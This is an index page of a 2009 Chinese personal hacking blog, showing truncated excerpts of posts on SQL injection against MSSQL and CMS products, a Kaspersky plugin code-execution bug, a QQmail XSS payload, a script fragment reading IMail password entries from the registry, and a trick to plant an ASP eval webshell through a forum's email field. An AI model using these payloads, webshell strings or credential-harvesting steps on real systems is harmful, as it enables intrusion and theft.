寂寞hacker 悠悠天地奈何独立苍茫?

寂寞hacker 悠悠天地奈何独立苍茫?

百度空间 | 百度首页

文章列表

Kaspersky Internet Security 2009 SCIEPlgn.dll Remote Code Execution

2009-06-30 20:55

Author: JINN[0xjinn_at_gmail.com] www.cisrg.org

SCIEPlgn.dll is a script monitor, it's also a Internet Explore plugin.
So, we can load and startup it from <object> tag, when it's loading, a
memory
corruption vulnerability is occurred, EIP is rewriting, so, this is a
remote
code execution vulnerability.

This vulnerability was tested w

类别：Windows | 评论(0) | 浏览()

简单获取IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码

2009-06-30 20:54

以前曾写过一篇博文《重置IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码》，主要用作在不小心修改了IIS里面的相关账户的情况。今天逛Bin牛(aspxspy作者)的Blog的时候，突然注意到他有一篇比较早的日志提到IIS的用户名和密码貌似是明

类别：Web | 评论(0) | 浏览()

MSSQL下用UNION和系统表配合猜表名和字段名深度注入

2009-06-30 20:54

Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul
转载请带上版权。

这是这次出攻防大赛题目的时候顺便做的一些注入总结，是我通过查询系统表结构总结出来的。只要注入点有效，并且没有过滤单引号，即使它管理员表名和字段名设置的再复杂都是可以猜出来的，而且由于是用union，效率还是很高的。还有只需要DBO权限即可。

以一个数字型注入点为例( 暂时假设这个数字型注入点对单

类别：数据库 | 评论(0) | 浏览()

MSSQL注入利用Group by&having猜表名和字段名

2009-06-30 20:54

lcx和剑心等大牛在06年的时候就已经在用这种语法了，而我等小辈到最近才领略到，惭愧惭愧......

手头暂时没有注入点测试，就先以我机器上的MSSQL做实验吧。
下面的语句我直接写完整的SQL语句，注入的时候稍微改改就能用了，呵呵。

假如现在有个注入点，所查询表的结构如下图:

但是我们是不知道表明，不知道列名的....

类别：数据库 | 评论(0) | 浏览()

IIS写权限漏洞原理&利用工具手动版

2009-06-30 20:53

很老的东西了，严格的说不是漏洞，只是设置不善造成的Bug。八百年遇不到一会，结果前几天不幸碰上了。
用JSKY扫描人家的站，结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧，我猜JSKY用的参数一定是“/”)。

还好，最后搞进去把人家的站恢复了，真惊险。还义务帮他补漏洞，删后门......

其中

类别：Web | 评论(1) | 浏览()

老Y文章管理系统注射0day

2009-06-25 08:20

漏洞等级：中等
漏洞说明：

漏洞出现在js.asp中，我们首先看源代码。

Code:

If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1，与数组2进行整形过滤。这里没有漏洞
End if

nu

类别：Web | 评论(0) | 浏览()

乘风多用户PHP统计系统 v4.0 注射漏洞

2009-06-25 08:18

今天看东西看累了，就随便下载了这样的一套代码。

大家可以看下他的说明，号称完全防注入攻击，密码32位Md5加密。

看了一下大部分注射是基本不可能了，除非对方漏写东西。

但是有这样一个比较可说的漏洞。

cf_do.php

Code:
//留言
if($action=="gbookaddsave")
{
$username

类别：Web | 评论(0) | 浏览()

通过SQL SERVER远程上传文件的实现

2009-06-25 08:16

我记得有一种黑客工具，在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方
服务器上面,并远程执行DOS命令。当时觉得很好奇，当然作为程序员的我觉得很不爽，
赶快对SQL SERVER进行了一番研究，并整理出了这篇文章，希望对一些程序新手会有帮助。
写过数据库程序的朋友应该知道，我们可以往数据库中存取各种类型的资

类别：数据库 | 评论(0) | 浏览()

QQmail Multiple Xss Vulnerabilities

2009-06-25 08:14

QQmail Multiple Xss Vulnerabilities

Author: www.80vul.com

1. firefox2 css xss vulnerabilities

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</sty

类别：Web | 评论(0) | 浏览()

imail密码解密

2009-05-29 11:10

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Ipswitch\IMail\Domains"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
wscript.echo "Domain: "&subkey
strKeyPath2 = strKeyPath&"\

类别：技术工具 | 评论(0) | 浏览()

帝国备份王拿shell

2009-05-29 11:09

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：fhod

帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.

可在 http://www.phome.net/ebak2008os/ 下载到

默认账号密码为
admin 123456

登陆后先备份一次数据

备份时可选择备份到的目录。。默认有个safemod

当然也可以是别的..这里以safemod来说了

备份完毕后来到

管理

类别：Php | 评论(0) | 浏览()

dvbbs删除upload.inc后得shell得方法

2009-05-29 11:09

dvbbs删除upload.inc后得shell得方法 - 前提是得到前后台管理权限

进入后台后
先到用户管理
随便改个人的邮件地址为
<%eval request(chr(35))%>@163.com

保存后
找到邮件列表导出

然后导出邮件列表

类别：Web | 评论(0) | 浏览()

SQL注入:突破关键字过滤

2009-05-28 10:12

　　一直以来都以为只有空格，tab键和注释符/**/可以用来切割sql关键字，段时间在邪八看了风迅cms注入漏洞那篇帖子，才知道原来回车也可以用来作为分割符（以前竟然没有想到，真是失败）。回车的ascii码是chr(13)&chr(10)，至于为什么要两个连在一起，这个我也不知道。转换成url编码形式是%0d%0a，于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
　　引申一下，只用%0d能正常执行语句吗？只用%0a呢？测试证明，用任意一种分割在mssql、mysql和access里面都是可以的。
　　另外，关于mssql的多语句问题。我以

类别：数据库 | 评论(1) | 浏览()

SQL语句导入导出大全

2009-05-23 00:02

/******* 导出到excel
EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa" -P""'

/*********** 导入Excel
Select *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Pass

类别：数据库 | 评论(1) | 浏览()

WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞

2009-05-18 22:40

作者：MJ0011 2009.05.13
感谢：Iceboy发现此问题并提供DUMP
漏洞厂商及产品：Microsoft Windows 7 rc 7100 090421
存在漏洞组件：win32k.sys Timestamp :49ee8dc8
存在漏洞函数:NtUserGetDc/NtUserGetDcEx

漏洞描述：Win32k.sys是WINDOWS的GDI驱动程序，包含大量复杂的图形界面处理，由于其中大量代码是从WIN3.1中修改

类别：Windows | 评论(0) | 浏览()

个人档案

寂寞hacker
男, 10岁
云南昆明
上次登录：
3天前

加为好友

发送消息

百度搜索

最新照片

背景音乐

文章分类

默认分类(13)

情感天空(33)

技术工具(93)

原创发布(19)

程序笔记(13)

linux学习笔记(23)

Web(145)

c++学习笔记(11)

Php(21)

windows核心编程基础(12)

软件破解(19)

Shellcode Template(2)

溢出笔记(4)

最近访客



§铁崖§	xgymcn
yoyou314	0soul
200711wc	mccheresy
juran2005	呼市二后生

其它

已有人次访问本空间

什么是RSS？

友情链接

©2009 Baidu